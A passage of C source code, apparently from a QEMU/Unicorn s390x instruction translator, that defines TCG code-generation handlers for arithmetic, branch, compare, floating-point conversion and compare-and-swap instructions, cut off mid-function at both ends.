*/ tcg_gen_add_i64(tcg_ctx, o->out, o->in1, o->in2); if (!s390_has_feat(s->uc, S390_FEAT_STFLE_45)) { tcg_gen_qemu_st_tl(tcg_ctx, o->out, o->addr1, get_mem_index(s), s->insn->data); } return DISAS_NEXT; } static DisasJumpType op_aeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_aeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_adb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_adb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_axb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_axb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->out, o->out2, o->in1, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_and(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_and_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_andi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int shift = s->insn->data & 0xff; int size = s->insn->data >> 8; uint64_t mask = ((1ull << size) - 1) << shift; assert(!o->g_in2); tcg_gen_shli_i64(tcg_ctx, o->in2, o->in2, shift); tcg_gen_ori_i64(tcg_ctx, o->in2, o->in2, ~mask); tcg_gen_and_i64(tcg_ctx, o->out, o->in1, o->in2); /* Produce the CC from only the bits manipulated. */ tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cc_dst, o->out, mask); set_cc_nz_u64(s, tcg_ctx->cc_dst); return DISAS_NEXT; } static DisasJumpType op_ni(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); if (!s390_has_feat(s->uc, S390_FEAT_INTERLOCKED_ACCESS_2)) { tcg_gen_qemu_ld_tl(tcg_ctx, o->in1, o->addr1, get_mem_index(s), s->insn->data); } else { /* Perform the atomic operation in memory. */ tcg_gen_atomic_fetch_and_i64(tcg_ctx, o->in1, o->addr1, o->in2, get_mem_index(s), s->insn->data); } /* Recompute also for atomic case: needed for setting CC. 
*/ tcg_gen_and_i64(tcg_ctx, o->out, o->in1, o->in2); if (!s390_has_feat(s->uc, S390_FEAT_INTERLOCKED_ACCESS_2)) { tcg_gen_qemu_st_tl(tcg_ctx, o->out, o->addr1, get_mem_index(s), s->insn->data); } return DISAS_NEXT; } static DisasJumpType op_bas(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; pc_to_link_info(tcg_ctx, o->out, s, s->pc_tmp); if (o->in2) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->psw_addr, o->in2); per_branch(s, false); return DISAS_PC_UPDATED; } else { return DISAS_NEXT; } } static void save_link_info(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t; if (s->base.tb->flags & (FLAG_MASK_32 | FLAG_MASK_64)) { pc_to_link_info(tcg_ctx, o->out, s, s->pc_tmp); return; } gen_op_calc_cc(s); tcg_gen_andi_i64(tcg_ctx, o->out, o->out, 0xffffffff00000000ull); tcg_gen_ori_i64(tcg_ctx, o->out, o->out, ((s->ilen / 2) << 30) | s->pc_tmp); t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t, tcg_ctx->psw_mask, 16); tcg_gen_andi_i64(tcg_ctx, t, t, 0x0f000000); tcg_gen_or_i64(tcg_ctx, o->out, o->out, t); tcg_gen_extu_i32_i64(tcg_ctx, t, tcg_ctx->cc_op); tcg_gen_shli_i64(tcg_ctx, t, t, 28); tcg_gen_or_i64(tcg_ctx, o->out, o->out, t); tcg_temp_free_i64(tcg_ctx, t); } static DisasJumpType op_bal(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; save_link_info(s, o); if (o->in2) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->psw_addr, o->in2); per_branch(s, false); return DISAS_PC_UPDATED; } else { return DISAS_NEXT; } } static DisasJumpType op_basi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; pc_to_link_info(tcg_ctx, o->out, s, s->pc_tmp); return help_goto_direct(s, s->base.pc_next + (int64_t)get_field(s, i2) * 2); } static DisasJumpType op_bc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int m1 = get_field(s, m1); bool is_imm = have_field(s, i2); int imm = is_imm ? get_field(s, i2) : 0; DisasCompare c; /* BCR with R2 = 0 causes no branching */ if (have_field(s, r2) && get_field(s, r2) == 0) { if (m1 == 14) { /* Perform serialization */ /* FIXME: check for fast-BCR-serialization facility */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); } if (m1 == 15) { /* Perform serialization */ /* FIXME: perform checkpoint-synchronisation */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); } return DISAS_NEXT; } disas_jcc(s, &c, m1); return help_branch(s, &c, is_imm, imm, o->in2); } static DisasJumpType op_bct32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); bool is_imm = have_field(s, i2); int imm = is_imm ? 
get_field(s, i2) : 0; DisasCompare c; TCGv_i64 t; c.cond = TCG_COND_NE; c.is_64 = false; c.g1 = false; c.g2 = false; t = tcg_temp_new_i64(tcg_ctx); tcg_gen_subi_i64(tcg_ctx, t, tcg_ctx->regs[r1], 1); store_reg32_i64(tcg_ctx, r1, t); c.u.s32.a = tcg_temp_new_i32(tcg_ctx); c.u.s32.b = tcg_const_i32(tcg_ctx, 0); tcg_gen_extrl_i64_i32(tcg_ctx, c.u.s32.a, t); tcg_temp_free_i64(tcg_ctx, t); return help_branch(s, &c, is_imm, imm, o->in2); } static DisasJumpType op_bcth(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int imm = get_field(s, i2); DisasCompare c; TCGv_i64 t; c.cond = TCG_COND_NE; c.is_64 = false; c.g1 = false; c.g2 = false; t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t, tcg_ctx->regs[r1], 32); tcg_gen_subi_i64(tcg_ctx, t, t, 1); store_reg32h_i64(tcg_ctx, r1, t); c.u.s32.a = tcg_temp_new_i32(tcg_ctx); c.u.s32.b = tcg_const_i32(tcg_ctx, 0); tcg_gen_extrl_i64_i32(tcg_ctx, c.u.s32.a, t); tcg_temp_free_i64(tcg_ctx, t); return help_branch(s, &c, 1, imm, o->in2); } static DisasJumpType op_bct64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); bool is_imm = have_field(s, i2); int imm = is_imm ? get_field(s, i2) : 0; DisasCompare c; c.cond = TCG_COND_NE; c.is_64 = true; c.g1 = true; c.g2 = false; tcg_gen_subi_i64(tcg_ctx, tcg_ctx->regs[r1], tcg_ctx->regs[r1], 1); c.u.s64.a = tcg_ctx->regs[r1]; c.u.s64.b = tcg_const_i64(tcg_ctx, 0); return help_branch(s, &c, is_imm, imm, o->in2); } static DisasJumpType op_bx32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); bool is_imm = have_field(s, i2); int imm = is_imm ? get_field(s, i2) : 0; DisasCompare c; TCGv_i64 t; c.cond = (s->insn->data ? TCG_COND_LE : TCG_COND_GT); c.is_64 = false; c.g1 = false; c.g2 = false; t = tcg_temp_new_i64(tcg_ctx); tcg_gen_add_i64(tcg_ctx, t, tcg_ctx->regs[r1], tcg_ctx->regs[r3]); c.u.s32.a = tcg_temp_new_i32(tcg_ctx); c.u.s32.b = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, c.u.s32.a, t); tcg_gen_extrl_i64_i32(tcg_ctx, c.u.s32.b, tcg_ctx->regs[r3 | 1]); store_reg32_i64(tcg_ctx, r1, t); tcg_temp_free_i64(tcg_ctx, t); return help_branch(s, &c, is_imm, imm, o->in2); } static DisasJumpType op_bx64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); bool is_imm = have_field(s, i2); int imm = is_imm ? get_field(s, i2) : 0; DisasCompare c; c.cond = (s->insn->data ? 
TCG_COND_LE : TCG_COND_GT); c.is_64 = true; if (r1 == (r3 | 1)) { c.u.s64.b = load_reg(tcg_ctx, r3 | 1); c.g2 = false; } else { c.u.s64.b = tcg_ctx->regs[r3 | 1]; c.g2 = true; } tcg_gen_add_i64(tcg_ctx, tcg_ctx->regs[r1], tcg_ctx->regs[r1], tcg_ctx->regs[r3]); c.u.s64.a = tcg_ctx->regs[r1]; c.g1 = true; return help_branch(s, &c, is_imm, imm, o->in2); } static DisasJumpType op_cj(DisasContext *s, DisasOps *o) { int imm, m3 = get_field(s, m3); bool is_imm; DisasCompare c; c.cond = ltgt_cond[m3]; if (s->insn->data) { c.cond = tcg_unsigned_cond(c.cond); } c.is_64 = c.g1 = c.g2 = true; c.u.s64.a = o->in1; c.u.s64.b = o->in2; is_imm = have_field(s, i4); if (is_imm) { imm = get_field(s, i4); } else { imm = 0; o->out = get_address(s, 0, get_field(s, b4), get_field(s, d4)); } return help_branch(s, &c, is_imm, imm, o->out); } static DisasJumpType op_ceb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_ceb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_cdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_cdb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_cxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_cxb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->out, o->out2, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static TCGv_i32 fpinst_extract_m34(DisasContext *s, bool m3_with_fpe, bool m4_with_fpe) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const bool fpe = s390_has_feat(s->uc, S390_FEAT_FLOATING_POINT_EXT); uint8_t m3 = get_field(s, m3); uint8_t m4 = get_field(s, m4); /* m3 field was introduced with FPE */ if (!fpe && m3_with_fpe) { m3 = 0; } /* m4 field was introduced with FPE */ if (!fpe && m4_with_fpe) { m4 = 0; } /* Check for valid rounding modes. Mode 3 was introduced later. 
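   Mode 0 uses the current FPC rounding mode, 1 rounds to nearest with
   ties away from zero, 4..7 are nearest-even, toward zero, toward +inf
   and toward -inf; 2 is reserved, and 3 (round to prepare for shorter
   precision) requires the floating-point extension facility.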
*/ if (m3 == 2 || m3 > 7 || (!fpe && m3 == 3)) { gen_program_exception(s, PGM_SPECIFICATION); return NULL; } return tcg_const_i32(tcg_ctx, deposit32(m3, 4, 4, m4)); } static DisasJumpType op_cfeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cfeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f32(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_cfdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cfdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f64(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_cfxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cfxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f128(s, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_cgeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cgeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f32(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_cgdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cgdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f64(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_cgxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cgxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f128(s, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_clfeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_clfeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f32(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_clfdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_clfdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f64(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_clfxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_clfxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f128(s, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_clgeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_clgeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); 
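    /* CC for the conversion is derived from the f32 source operand (CC_OP_NZ_F32). */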
gen_set_cc_nz_f32(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_clgdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_clgdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f64(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_clgxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_clgxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f128(s, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_cegb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, true, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cegb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_cdgb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, true, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cdgb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_cxgb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, true, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cxgb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_celgb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_celgb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_cdlgb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_cdlgb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_cxlgb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_cxlgb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_cksm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r2 = get_field(s, r2); TCGv_i64 len = tcg_temp_new_i64(tcg_ctx); gen_helper_cksm(tcg_ctx, len, tcg_ctx->cpu_env, o->in1, o->in2, tcg_ctx->regs[r2 + 1]); set_cc_static(s); return_low128(tcg_ctx, o->out); tcg_gen_add_i64(tcg_ctx, tcg_ctx->regs[r2], tcg_ctx->regs[r2], len); tcg_gen_sub_i64(tcg_ctx, tcg_ctx->regs[r2 + 1], tcg_ctx->regs[r2 + 1], len); tcg_temp_free_i64(tcg_ctx, len); return DISAS_NEXT; } static DisasJumpType op_clc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int l = get_field(s, l1); TCGv_i32 vl; switch (l + 1) { case 1: tcg_gen_qemu_ld8u(tcg_ctx, tcg_ctx->cc_src, o->addr1, get_mem_index(s)); tcg_gen_qemu_ld8u(tcg_ctx, tcg_ctx->cc_dst, o->in2, get_mem_index(s)); break; case 2: tcg_gen_qemu_ld16u(tcg_ctx, tcg_ctx->cc_src, o->addr1, get_mem_index(s)); 
tcg_gen_qemu_ld16u(tcg_ctx, tcg_ctx->cc_dst, o->in2, get_mem_index(s)); break; case 4: tcg_gen_qemu_ld32u(tcg_ctx, tcg_ctx->cc_src, o->addr1, get_mem_index(s)); tcg_gen_qemu_ld32u(tcg_ctx, tcg_ctx->cc_dst, o->in2, get_mem_index(s)); break; case 8: tcg_gen_qemu_ld64(tcg_ctx, tcg_ctx->cc_src, o->addr1, get_mem_index(s)); tcg_gen_qemu_ld64(tcg_ctx, tcg_ctx->cc_dst, o->in2, get_mem_index(s)); break; default: vl = tcg_const_i32(tcg_ctx, l); gen_helper_clc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, vl, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, vl); set_cc_static(s); return DISAS_NEXT; } gen_op_update2_cc_i64(s, CC_OP_LTUGTU_64, tcg_ctx->cc_src, tcg_ctx->cc_dst); return DISAS_NEXT; } static DisasJumpType op_clcl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r2 = get_field(s, r2); TCGv_i32 t1, t2; /* r1 and r2 must be even. */ if (r1 & 1 || r2 & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t1 = tcg_const_i32(tcg_ctx, r1); t2 = tcg_const_i32(tcg_ctx, r2); gen_helper_clcl(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_clcle(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i32 t1, t3; /* r1 and r3 must be even. */ if (r1 & 1 || r3 & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t1 = tcg_const_i32(tcg_ctx, r1); t3 = tcg_const_i32(tcg_ctx, r3); gen_helper_clcle(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, o->in2, t3); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t3); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_clclu(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i32 t1, t3; /* r1 and r3 must be even. 
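Like CLCL and CLCLE, CLCLU addresses its operands through even/odd register pairs (address in the even register, length in the odd one), so an odd register number is rejected with a specification exception just below.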
*/ if (r1 & 1 || r3 & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t1 = tcg_const_i32(tcg_ctx, r1); t3 = tcg_const_i32(tcg_ctx, r3); gen_helper_clclu(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, o->in2, t3); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t3); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_clm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m3 = tcg_const_i32(tcg_ctx, get_field(s, m3)); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t1, o->in1); gen_helper_clm(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, m3, o->in2); set_cc_static(s); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, m3); return DISAS_NEXT; } static DisasJumpType op_clst(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_clst(tcg_ctx, o->in1, tcg_ctx->cpu_env, tcg_ctx->regs[0], o->in1, o->in2); set_cc_static(s); return_low128(tcg_ctx, o->in2); return DISAS_NEXT; } static DisasJumpType op_cps(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t, o->in1, 0x8000000000000000ull); tcg_gen_andi_i64(tcg_ctx, o->out, o->in2, 0x7fffffffffffffffull); tcg_gen_or_i64(tcg_ctx, o->out, o->out, t); tcg_temp_free_i64(tcg_ctx, t); return DISAS_NEXT; } static DisasJumpType op_cs(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int d2 = get_field(s, d2); int b2 = get_field(s, b2); TCGv_i64 addr, cc; /* Note that in1 = R3 (new value) and in2 = (zero-extended) R1 (expected value). */ addr = get_address(s, 0, b2, d2); tcg_gen_atomic_cmpxchg_i64(tcg_ctx, o->out, addr, o->in2, o->in1, get_mem_index(s), s->insn->data | MO_ALIGN); tcg_temp_free_i64(tcg_ctx, addr); /* Are the memory and expected values (un)equal? Note that this setcond produces the output CC value, thus the NE sense of the test. */ cc = tcg_temp_new_i64(tcg_ctx); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_NE, cc, o->in2, o->out); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cc_op, cc); tcg_temp_free_i64(tcg_ctx, cc); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_cdsg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); int d2 = get_field(s, d2); int b2 = get_field(s, b2); DisasJumpType ret = DISAS_NEXT; TCGv_i64 addr; TCGv_i32 t_r1, t_r3; /* Note that R1:R1+1 = expected value and R3:R3+1 = new value. 
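CDSG is thus a 128-bit compare-and-swap: the even/odd pair R1:R1+1 is compared with the doubleword pair at the second-operand address and, on equality, replaced there by R3:R3+1.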
*/ addr = get_address(s, 0, b2, d2); t_r1 = tcg_const_i32(tcg_ctx, r1); t_r3 = tcg_const_i32(tcg_ctx, r3); if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_helper_cdsg(tcg_ctx, tcg_ctx->cpu_env, addr, t_r1, t_r3); } else if (HAVE_CMPXCHG128) { gen_helper_cdsg_parallel(tcg_ctx, tcg_ctx->cpu_env, addr, t_r1, t_r3); } else { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); ret = DISAS_NORETURN; } tcg_temp_free_i64(tcg_ctx, addr); tcg_temp_free_i32(tcg_ctx, t_r1); tcg_temp_free_i32(tcg_ctx, t_r3); set_cc_static(s); return ret; } static DisasJumpType op_csst(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r3 = get_field(s, r3); TCGv_i32 t_r3 = tcg_const_i32(tcg_ctx, r3); if (tb_cflags(s->base.tb) & CF_PARALLEL) { gen_helper_csst_parallel(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t_r3, o->addr1, o->in2); } else { gen_helper_csst(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t_r3, o->addr1, o->in2); } tcg_temp_free_i32(tcg_ctx, t_r3); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_csp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp mop = s->insn->data; TCGv_i64 addr, old, cc; TCGLabel *lab = gen_new_label(tcg_ctx); /* Note that in1 = R1 (zero-extended expected value), out = R1 (original reg), out2 = R1+1 (new value). */ addr = tcg_temp_new_i64(tcg_ctx); old = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, addr, o->in2, -1ULL << (mop & MO_SIZE)); tcg_gen_atomic_cmpxchg_i64(tcg_ctx, old, addr, o->in1, o->out2, get_mem_index(s), mop | MO_ALIGN); tcg_temp_free_i64(tcg_ctx, addr); /* Are the memory and expected values (un)equal? */ cc = tcg_temp_new_i64(tcg_ctx); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_NE, cc, o->in1, old); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cc_op, cc); /* Write back the output now, so that it happens before the following branch, so that we don't need local temps. */ if ((mop & MO_SIZE) == MO_32) { tcg_gen_deposit_i64(tcg_ctx, o->out, o->out, old, 0, 32); } else { tcg_gen_mov_i64(tcg_ctx, o->out, old); } tcg_temp_free_i64(tcg_ctx, old); /* If the comparison was equal, and the LSB of R2 was set, then we need to flush the TLB (for all cpus). */ tcg_gen_xori_i64(tcg_ctx, cc, cc, 1); tcg_gen_and_i64(tcg_ctx, cc, cc, o->in2); tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_EQ, cc, 0, lab); tcg_temp_free_i64(tcg_ctx, cc); gen_helper_purge(tcg_ctx, tcg_ctx->cpu_env); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_cvd(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t2, o->in1); gen_helper_cvd(tcg_ctx, t1, t2); tcg_temp_free_i32(tcg_ctx, t2); tcg_gen_qemu_st64(tcg_ctx, t1, o->in2, get_mem_index(s)); tcg_temp_free_i64(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_ct(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int m3 = get_field(s, m3); TCGLabel *lab = gen_new_label(tcg_ctx); TCGCond c; c = 